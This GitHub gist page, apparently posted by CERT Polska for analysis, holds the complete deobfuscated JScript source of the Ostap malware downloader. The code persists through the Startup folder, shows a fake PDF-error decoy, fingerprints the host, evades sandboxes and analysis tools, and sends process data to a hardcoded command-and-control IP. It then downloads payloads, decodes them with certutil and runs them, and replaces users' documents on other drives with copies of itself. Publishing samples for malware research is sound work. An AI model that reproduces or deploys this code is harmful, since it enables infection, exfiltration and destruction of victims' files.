Skip to content

Instantly share code, notes, and snippets.

@CERT-Polska-Blog CERT-Polska-Blog/2018.js Secret
Created Jun 1, 2018

Embed
What would you like to do?
2018 Ostap deobfuscated
LopSertedokeralarmBecause45aw = 0.698;
LopSertedokerpoured97aw = 0.104;
LopSertedokerpanI75aw = 0.122;
LopSertedokerworld22aw = 0.878;
LopSertedokerBefore34aw = 0.631;
LopSertedokerName74aw = 0.89;
LopSertedokerbetter22aw = 0.74;
cfvgbhnj = 'Code';
cojzivbowLet35aw = 0.373;
ftvgbhdr = '';
cojzivpanI3aw = 0.713;
cojzivworld19aw = 0.308;
cojzivBefore35aw = 0.754;
cojzivName81aw = 0.83;
cojzivbetter6aw = 0.359;
AwKolp = String['from' + ftvgbhdr + 'Char' + cfvgbhnj];
function KereYu(cf, jk, nm) {
cf = (jk || 2) >> nm;
return nm.length + 8 - 8;
}
;
LopSertedokerhast69aw = 0.252;
LopSertedokeruntouchedI87aw = 0.225;
LopSertedokerweep52aw = 0.88;
LopSertedokerpeace36aw = 0.249;
LopSertedokeroer54aw = 0.379;
LopSertedokerSpontaneityO50aw = 0.23;
LopSertedokerblow23aw = 0.39;
LopSertedokernightPart10aw = 0.157;
var LopSertedokersuch71aw = false;
var LopSertedokerflesh22 = this['Enumerator'];
var LopSertedokerweep52aw = 0.422;
var LopSertedokerwith51 = this['ActiveXObject'];
var LopSertedokerwould92aw = 'goreAnd42';
var LopSertedokerpraiseOut58 = this['WScript'];
var LopSertedokertrusting51aw = { Y: 65 };
var LopSertedokergraveto35 = LopSertedokerpraiseOut58['ScriptFullName'];
var LopSertedokeralarmBecause45aw = 'hair23';
var LopSertedokermeIn53 = this['GetObject'];
var LopSertedokerdays71aw = true;
var LopSertedokerornamented19 = new LopSertedokerwith51('Scripting.FileSystemObject');
var LopSertedokerfollow28aw = { H: 78 };
var LopSertedokernight58 = LopSertedokerpraiseOut58['CreateObject']('WScript.Shell');
var LopSertedokerblend29aw = 'hell46';
var LopSertedokermissiveYou93 = new LopSertedokerwith51('ADODB.Stream');
var LopSertedokerPeace71aw = 0.631;
var LopSertedokerloving96 = new LopSertedokerwith51('Shell.Application');
var LopSertedokerpeace71aw = { C: 67 };
var LopSertedokerHomer53 = new LopSertedokerwith51('Msxml2.ServerXMLHTTP');
var LopSertedokerinto40aw = 'listen56';
var LopSertedokermercy31 = '\\';
var LopSertedokerrepineEnough67aw = { S: 73 };
var LopSertedokerstreetsThe84 = LopSertedokernight58['ExpandEnvironmentStrings']('%USERPROFILE%');
var LopSertedokerthreat49aw = 'world3';
var LopSertedokerjoyful79 = '"';
var LopSertedokerthreat49aw = 'world3';
var LopSertedokerjoyful79_one = '\'';
var LopSertedokerusBless41aw = false;
var LopSertedokerantique28 = LopSertedokernight58['ExpandEnvironmentStrings']('%TEMP%');
var LopSertedokerlife28aw = { F: 85 };
var LopSertedokerbefore5 = Math['floor'](Math['random']() * 999 + 1);
var LopSertedokerinto40aw = null;
var LopSertedokerhose4 = LopSertedokerloving96['NameSpace'](3 + 4);
var LopSertedokerlampoonseeking36aw = 'your25';
var LopSertedokernourishmentAs82 = LopSertedokermercy31 + 'mn.jse';
var LopSertedokerlightAre38aw = null;
var LopSertedokerseven3 = '&add=james';
var LopSertedokerwith96aw = true;
var LopSertedokershade31 = 'https://185.159.82.230/gazprom8/milertut.php';
var LopSertedokerEverybody2aw = { P: 79 };
var LopSertedokerbeNearer45 = '?LopSertedokerbeNearer45=awsedrftgyhujiko';
var LopSertedokerstrong92aw = [
96,
703
];
var LopSertedokermeMy43 = LopSertedokershade31 + LopSertedokerbeNearer45;
var LopSertedokerweep52aw = 0.422;
var LopSertedokerself39 = true;
var LopSertedokerwould92aw = 'goreAnd42';
var LopSertedokermine66 = true;
var LopSertedokertrusting51aw = { Y: 65 };
var LopSertedokercomes87 = false;
var LopSertedokeralarmBecause45aw = 'hair23';
var LopSertedokerthere98 = '';
var LopSertedokerdays71aw = true;
var LopSertedokerbeNearer66 = '';
var LopSertedokerfollow28aw = { H: 78 };
var LopSertedokerforgotten56 = 1;
var LopSertedokerblend29aw = 'hell46';
var LopSertedokerTheeNearer67 = 0;
var LopSertedokerPeace71aw = 0.631;
var LopSertedokeraliveI75 = false;
var LopSertedokerpeace71aw = { C: 67 };
var LopSertedokerbanquet34 = 0;
var LopSertedokerinto40aw = 'listen56';
var LopSertedokermomentLay26 = 0;
var LopSertedokerrepineEnough67aw = { S: 73 };
var LopSertedokerbreathAs46 = 0;
var LopSertedokerthreat49aw = 'world3';
var LopSertedokerdreams41 = false;
var LopSertedokerdoorwaysand61aw = null;
var LopSertedokercloud66 = 3;
var LopSertedokerusBless41aw = false;
var LopSertedokerforfeitLies33 = null;
var LopSertedokerlife28aw = { F: 85 };
var LopSertedokerdeathI95 = null;
var LopSertedokerinto40aw = null;
var LopSertedokershadow58 = false;
var LopSertedokerlampoonseeking36aw = 'your25';
var LopSertedokerremainedEgypt75 = null;
var LopSertedokerlightAre38aw = null;
var LopSertedokerthat32 = 'MZ';
var LopSertedokerwith96aw = true;
var LopSertedokerprincipleWhy6 = 'POST';
var LopSertedokerEverybody2aw = { P: 79 };
var LopSertedokerthat2 = null;
var LopSertedokerstrong92aw = [
96,
703
];
var LopSertedokermeaning90 = null;
var LopSertedokerweep52aw = 0.422;
var LopSertedokerdeaths16 = null;
var LopSertedokerwould92aw = 'goreAnd42';
var LopSertedokersent73 = LopSertedokerhose4['Self']['Path'] + LopSertedokernourishmentAs82;
var LopSertedokertrusting51aw = { Y: 65 };
var LopSertedokerrest99 = LopSertedokersent73 + LopSertedokerantique28;
var LopSertedokeralarmBecause45aw = 'hair23';
var LopSertedokerwill96 = ('2070000') * 1;
var LopSertedokerdays71aw = true;
var LopSertedokermoon92 = '-f -decode ';
var LopSertedokerfollow28aw = { H: 78 };
var LopSertedokergraceThat49 = ('4294967295') * 1;
var LopSertedokerblend29aw = 'hell46';
var LopSertedokerfollow9 = null;
var LopSertedokerPeace71aw = 0.631;
var LopSertedokerdamned84 = null;
var LopSertedokerpeace71aw = { C: 67 };
var LopSertedokersunFather58 = LopSertedokerbanquet34;
var LopSertedokerinto40aw = 'listen56';
var LopSertedokerGod11 = null;
var LopSertedokerrepineEnough67aw = { S: 73 };
var LopSertedokerstars95 = LopSertedokerbanquet34;
var LopSertedokerpeace71aw = { C: 67 };
var LopSertedokersunFather582 = null;
var LopSertedokerdoorwaysand61aw = null;
var LopSertedokeruntouchedI87 = '';
var LopSertedokerusBless41aw = false;
var LopSertedokerdone9 = '';
var LopSertedokerlife28aw = { F: 85 };
var LopSertedokerwhom87 = '';
var LopSertedokerinto40aw = null;
var LopSertedokerwill99 = '';
var LopSertedokerlampoonseeking36aw = 'your25';
var LopSertedokercould65 = '';
var LopSertedokerlightAre38aw = null;
var LopSertedokerentire18 = LopSertedokerornamented19['Drives'];
var LopSertedokerwith96aw = true;
var LopSertedokerpeople86 = null;
var LopSertedokerEverybody2aw = { P: 79 };
var LopSertedokercolor29 = null;
var LopSertedokerstrong92aw = [
96,
703
];
var LopSertedokerforgotten46 = '*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb *.wps *.xlk *.ppt *.mdb *.accdb *.pst *.dwg *.dxf *.dxg *.wpd';
var LopSertedokerweep52aw = 0.422;
var LopSertedokermysterythere71 = 1;
var LopSertedokerwould92aw = 'goreAnd42';
var LopSertedokerwhat37 = 'Lafamiliaestodo.txt';
var LopSertedokertrusting51aw = { Y: 65 };
var LopSertedokerwill65 = null;
var LopSertedokeralarmBecause45aw = 'hair23';
var LopSertedokertiresof27 = null;
var LopSertedokerdays71aw = true;
var LopSertedokercars80 = 1;
var LopSertedokerfollow28aw = { H: 78 };
var LopSertedokerthings47 = 4;
var LopSertedokerblend29aw = 'hell46';
var LopSertedokerblack5 = 0;
var LopSertedokerPeace71aw = 0.631;
var LopSertedokerthose17 = false;
var LopSertedokerpeace71aw = { C: 67 };
var LopSertedokerHistoria19 = 40;
var LopSertedokerinto40aw = 'listen56';
var LopSertedokercloud56 = -1;
var LopSertedokerrepineEnough67aw = { S: 73 };
var LopSertedokerGod45 = 7;
var LopSertedokerthreat49aw = 'world3';
var LopSertedokerlanguagenor72 = 16;
var LopSertedokerdoorwaysand61aw = null;
var LopSertedokerthese30 = 'Error';
var LopSertedokerusBless41aw = false;
var LopSertedokerwill81 = 'PDF Error: The document could not be printed.';
{
var KmnOlpkJuig;
try {
if (LopSertedokergraveto35 != LopSertedokersent73) {
LopSertedokerforfeitLies33 = LopSertedokerornamented19['OpenTextFile'](LopSertedokergraveto35, LopSertedokercars80, false, 0);
LopSertedokertiresof27 = LopSertedokerforfeitLies33['ReadLine']();
LopSertedokerforfeitLies33['Close']();
LopSertedokerdreams41 = true;
if (LopSertedokerself39)
LopSertedokernight58['Popup'](LopSertedokerwill81, 11, LopSertedokerthese30, LopSertedokerlanguagenor72);
if (LopSertedokerornamented19['FileExists'](LopSertedokersent73)) {
LopSertedokerpraiseOut58['Quit'];
}
} else {
}
} catch (_KmnOlpkJuig) {
KmnOlpkJuig = _KmnOlpkJuig;
{
LopSertedokernight58['Popup'](LopSertedokerwill81, 6, LopSertedokerthese30, LopSertedokerlanguagenor72);
}
}
}
while (LopSertedokerlanguagenor72) {
LopSertedokerwill81 = 'low';
LopSertedokerforgotten56 = LopSertedokerforgotten56 + 1;
if (LopSertedokerforgotten56 == LopSertedokerwill96) {
{
var KmnOlpkJuig;
try {
LopSertedokerdamned84 = LopSertedokermeIn53('winmgmts:{impersonationLevel=impersonate}!' + LopSertedokermercy31 + LopSertedokermercy31 + '.' + LopSertedokermercy31 + 'root' + LopSertedokermercy31 + 'cimv2');
LopSertedokersunFather58 = new LopSertedokerflesh22(LopSertedokerdamned84['ExecQuery']('Select * from Win32_Process'));
LopSertedokersunFather582 = new LopSertedokerflesh22(LopSertedokerdamned84['ExecQuery']('Select * from Win32_OperatingSystem'));
while (!LopSertedokersunFather582['atEnd']()) {
if (LopSertedokerblack5 == 5)
break;
LopSertedokerdone9 = LopSertedokerdone9 + LopSertedokersunFather582['item']()['Caption'] + LopSertedokersunFather582['item']()['Version'];
LopSertedokerblack5++;
LopSertedokersunFather582['moveNext']();
}
LopSertedokerdone9 = LopSertedokerdone9 + String['fromCharCode'](10 + 3) + String['fromCharCode'](5 + 5) + LopSertedokersent73;
LopSertedokerblack5 = 0;
while (!LopSertedokersunFather58['atEnd']()) {
if (LopSertedokerblack5 == 200)
break;
LopSertedokerGod11 = LopSertedokersunFather58['item']();
LopSertedokeruntouchedI87 = LopSertedokeruntouchedI87 + LopSertedokerGod11['Name'] + '*' + LopSertedokerGod11['ExecutablePath'] + String['fromCharCode'](13) + String['fromCharCode'](10);
LopSertedokerblack5++;
LopSertedokersunFather58['moveNext']();
}
} catch (_KmnOlpkJuig) {
KmnOlpkJuig = _KmnOlpkJuig;
{
}
}
}
{
var KmnOlpkJuig;
try {
LopSertedokerrest99 = LopSertedokerrest99 + LopSertedokerdone9;
for (LopSertedokermomentLay26 = 0; LopSertedokermomentLay26 < LopSertedokerrest99['length']; LopSertedokermomentLay26++) {
LopSertedokerbanquet34 = (LopSertedokerbanquet34 << 5) - LopSertedokerbanquet34 + LopSertedokerrest99['charCodeAt'](LopSertedokermomentLay26) & LopSertedokergraceThat49;
}
if (LopSertedokersent73['indexOf'](LopSertedokermercy31 + 'AppData' + LopSertedokermercy31) == -1) {
LopSertedokermomentLay26 = 5 + 5;
} else {
LopSertedokermomentLay26 = 10 + 10;
}
} catch (_KmnOlpkJuig) {
KmnOlpkJuig = _KmnOlpkJuig;
{
LopSertedokerbanquet34 = 9999999;
}
}
}
LopSertedokeruntouchedI87 = LopSertedokerdone9 + String['fromCharCode'](10 + 3) + String['fromCharCode'](5 + 5) + LopSertedokeruntouchedI87;
if (LopSertedokeruntouchedI87['length'] < 1500 || LopSertedokeruntouchedI87['indexOf']('Microsoft Windows XP') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('2B.exe') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('Procmon') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('Wireshark') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('Temp' + LopSertedokermercy31 + 'iexplore.exe') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('ProcessHacker') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('vmtoolsd') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('VBoxService') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('python') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('Proxifier.exe') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('Johnson') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('ImmunityDebugger.exe') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('lordPE.exe') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('ctfmon.exe*JOHN-PC') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('BehaviorDumper') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('anti-virus.EXE') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('AgentSimulator.exe') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('VzService.exe') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('VBoxTray.exe') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('VmRemoteGuest') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('SystemIT|admin') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('WIN7-TRAPS') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('Emily' + LopSertedokermercy31 + 'AppData') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('PROCMON') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('procexp') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('tcpdump') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('FrzState2k') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('DFLocker64') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('vmware') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('LOGSystem.Agent.Service.exe') != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('C:' + LopSertedokermercy31 + 'Users' + LopSertedokermercy31 + 'user' + LopSertedokermercy31) != LopSertedokercloud56 || LopSertedokeruntouchedI87['indexOf']('C:' + LopSertedokermercy31 + 'Users' + LopSertedokermercy31 + 'milozs' + LopSertedokermercy31) != LopSertedokercloud56) {
ploha['show']('No more half-measures.');
LopSertedokerpraiseOut58['Quit'];
LopSertedokerthose17 = true;
}
{
var KmnOlpkJuig;
try {
if (LopSertedokerdreams41 && LopSertedokermine66) {
LopSertedokerdeathI95 = LopSertedokerornamented19['CreateTextFile'](LopSertedokersent73, true, false);
LopSertedokerdeathI95['WriteLine'](LopSertedokertiresof27);
LopSertedokerdeathI95['Close']();
}
} catch (_KmnOlpkJuig) {
KmnOlpkJuig = _KmnOlpkJuig;
{
}
}
}
while (LopSertedokerGod45) {
{
var KmnOlpkJuig;
try {
LopSertedokerbeNearer66 = LopSertedokerantique28 + LopSertedokermercy31 + Math['floor'](Math['random']() * 799 + 1) + Math['floor'](Math['random']() * 712 + 1) + '.exe';
LopSertedokerthere98 = LopSertedokerantique28 + LopSertedokermercy31 + Math['floor'](Math['random']() * 799 + 1) + Math['floor'](Math['random']() * 900 + 1) + '.mtm';
LopSertedokerHomer53['setOption'](LopSertedokercloud66, 'MSXML');
LopSertedokerfollow9 = LopSertedokermeMy43 + LopSertedokerseven3 + '&u=' + Math['abs'](LopSertedokerbanquet34) + '&o=' + LopSertedokerTheeNearer67 + '&v=' + LopSertedokermomentLay26 + '&s=' + Math['floor'](Math['random']() * 899 + 1) + Math['floor'](Math['random']() * 799 + 1) + Math['floor'](Math['random']() * 899 + 1);
LopSertedokerHomer53['open'](LopSertedokerprincipleWhy6, LopSertedokerfollow9, false);
LopSertedokerHomer53['send'](LopSertedokeruntouchedI87);
if (LopSertedokerHomer53['status'] == 200) {
if (LopSertedokerTheeNearer67 == 0) {
LopSertedokerremainedEgypt75 = LopSertedokerHomer53['responseText'];
try {
if (LopSertedokerHomer53['getResponseHeader']('We_are_done_when_I_say_we_are_done') == '0') {
LopSertedokerbeNearer66 = LopSertedokersent73;
LopSertedokercloud56 = 0;
}
} catch (KmnOlpkJuig) {
}
try {
if (LopSertedokerHomer53['getResponseHeader']('We_are_done_when_I_say_we_are_done') == '1')
LopSertedokercloud56 = 1;
} catch (KmnOlpkJuig) {
}
try {
if (LopSertedokerHomer53['getResponseHeader']('We_are_done_when_I_say_we_are_done') == '2')
LopSertedokercloud56 = 2;
} catch (KmnOlpkJuig) {
}
try {
if (LopSertedokerHomer53['getResponseHeader']('Content-Transfer-Encoding') == 'binary') {
LopSertedokermissiveYou93['Open']();
LopSertedokermissiveYou93['Type'] = 1;
LopSertedokermissiveYou93['Write'](LopSertedokerHomer53['responseBody']);
LopSertedokermissiveYou93['Position'] = 0;
LopSertedokermissiveYou93['SaveToFile'](LopSertedokerbeNearer66, 2);
LopSertedokermissiveYou93['Close']();
} else {
if (LopSertedokerremainedEgypt75.length > 10) {
LopSertedokerforfeitLies33 = LopSertedokerornamented19['CreateTextFile'](LopSertedokerthere98, true, false);
LopSertedokerforfeitLies33['WriteLine'](LopSertedokerremainedEgypt75);
LopSertedokerforfeitLies33['Close']();
LopSertedokerpraiseOut58['Sleep'](7000);
LopSertedokerloving96['ShellExecute']('certutil', LopSertedokermoon92 + LopSertedokerthere98 + ' ' + LopSertedokerjoyful79 + LopSertedokerbeNearer66 + LopSertedokerjoyful79, '', 'open', 0);
}
}
} catch (KmnOlpkJuig) {
}
} else {
LopSertedokerTheeNearer67 = 0;
continue;
}
if (LopSertedokercloud56 == 0) {
LopSertedokerpraiseOut58['Sleep'](60000);
LopSertedokercloud56 = -1;
LopSertedokerTheeNearer67 = 9;
continue;
}
LopSertedokerpraiseOut58['Sleep'](35000);
if (!LopSertedokerornamented19['FileExists'](LopSertedokerbeNearer66) && LopSertedokercomes87) {
try {
LopSertedokerpeople86 = new LopSertedokerflesh22(LopSertedokerentire18);
for (; !LopSertedokerpeople86['atEnd'](); LopSertedokerpeople86['moveNext']()) {
LopSertedokercolor29 = LopSertedokerpeople86['item']();
if (LopSertedokercolor29['IsReady'] && (LopSertedokercolor29['DriveType'] == 3 || LopSertedokercolor29['DriveType'] == 1) && LopSertedokerstreetsThe84['substring'](0, 1) != LopSertedokercolor29['DriveLetter']) {
LopSertedokerloving96['ShellExecute']('cmd', '/U /Q /C cd /D ' + LopSertedokercolor29['DriveLetter'] + ': && dir /b/s/x ' + LopSertedokerforgotten46 + '>>%TEMP%\\\\' + LopSertedokerwhat37, '', 'open', 0);
LopSertedokerpraiseOut58['Sleep'](1000 * 70);
}
}
LopSertedokerpraiseOut58['Sleep'](1000 * 50);
LopSertedokerdeaths16 = LopSertedokerornamented19['GetFile'](LopSertedokerantique28 + LopSertedokermercy31 + LopSertedokerwhat37)['OpenAsTextStream'](1, -1);
while (!LopSertedokerdeaths16['AtEndOfStream']) {
LopSertedokerwill99 = LopSertedokerdeaths16['ReadLine']();
LopSertedokercould65 = LopSertedokerwill99['substring'](0, LopSertedokerwill99['indexOf']('.'));
LopSertedokerloving96['ShellExecute']('cmd', '/U /Q /C copy /Y ' + LopSertedokerjoyful79 + LopSertedokersent73 + LopSertedokerjoyful79 + ' ' + LopSertedokerjoyful79 + LopSertedokercould65 + '.jse' + LopSertedokerjoyful79 + ' && del /Q/F ' + LopSertedokerjoyful79 + LopSertedokerwill99 + LopSertedokerjoyful79, '', 'open', 0);
}
LopSertedokerdeaths16['Close']();
LopSertedokerornamented19['DeleteFile'](LopSertedokerantique28 + LopSertedokermercy31 + LopSertedokerwhat37);
} catch (KmnOlpkJuig) {
}
LopSertedokerTheeNearer67 = 0;
continue;
}
LopSertedokermeaning90 = LopSertedokerornamented19['GetFile'](LopSertedokerbeNearer66)['OpenAsTextStream'](1);
LopSertedokerwhom87 = LopSertedokermeaning90['ReadLine']()['substring'](0, 2);
LopSertedokermeaning90['Close']();
if (LopSertedokerwhom87 == LopSertedokerthat32 && LopSertedokerTheeNearer67 == 0) {
try {
switch (LopSertedokercloud56) {
case -1:
try {
LopSertedokerloving96['ShellExecute']('cmd', '/c wmic Path win32_process Where ' + LopSertedokerjoyful79 + 'ExecutablePath Like ' + LopSertedokerjoyful79_one + '%Temp' + LopSertedokermercy31 + LopSertedokermercy31 + '%' + LopSertedokerjoyful79_one + LopSertedokerjoyful79 + ' Call Terminate', '', 'open', LopSertedokerbreathAs46);
} catch (KmnOlpkJuig) {
}
LopSertedokerpraiseOut58['Sleep'](10000);
LopSertedokerloving96['ShellExecute']('cmd', '/c start ' + LopSertedokerbeNearer66, '', 'open', LopSertedokerbreathAs46);
LopSertedokerpraiseOut58['Sleep'](10000);
try {
LopSertedokerloving96['ShellExecute']('cmd', '/c del /F ' + LopSertedokerjoyful79 + '%TEMP%\\*.exe' + LopSertedokerjoyful79, '', 'open', LopSertedokerbreathAs46);
} catch (KmnOlpkJuig) {
}
LopSertedokerTheeNearer67 = 45;
break;
case 0:
LopSertedokerloving96['ShellExecute']('cmd', '/c start ' + LopSertedokerbeNearer66, '', 'open', LopSertedokerbreathAs46);
LopSertedokerTheeNearer67 = 46;
break;
case 1:
LopSertedokerloving96['ShellExecute']('rundll32', LopSertedokerjoyful79 + LopSertedokerbeNearer66 + LopSertedokerjoyful79 + ' secretFunction', '', 'open', LopSertedokerbreathAs46);
LopSertedokerTheeNearer67 = 47;
break;
case 2:
try {
LopSertedokerloving96['ShellExecute']('cmd', '/c wmic Path win32_process Where ' + LopSertedokerjoyful79 + 'ExecutablePath Like ' + LopSertedokerjoyful79_one + '%Temp' + LopSertedokermercy31 + LopSertedokermercy31 + '%' + LopSertedokerjoyful79_one + LopSertedokerjoyful79 + ' Call Terminate', '', 'open', LopSertedokerbreathAs46);
} catch (KmnOlpkJuig) {
}
LopSertedokerloving96['ShellExecute'](LopSertedokerbeNearer66, '', '', 'runas', 1);
LopSertedokerTheeNearer67 = 48;
break;
}
} catch (KmnOlpkJuig) {
LopSertedokerTheeNearer67 = 9999;
}
LopSertedokerpraiseOut58['Sleep'](12000);
}
}
} catch (_KmnOlpkJuig) {
KmnOlpkJuig = _KmnOlpkJuig;
{
}
}
}
LopSertedokerpraiseOut58['Sleep'](60000);
}
;
}
;
}
;
LopSertedokerwith96aw = { L: 69 };
LopSertedokertrumpetAnd41aw = { P: 79 };
LopSertedokerNorman97aw = { X: 64 };
LopSertedokerweep52aw = { D: 68 };
LopSertedokerwould92aw = { N: 89 };
LopSertedokerloving70aw = { Y: 65 };
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.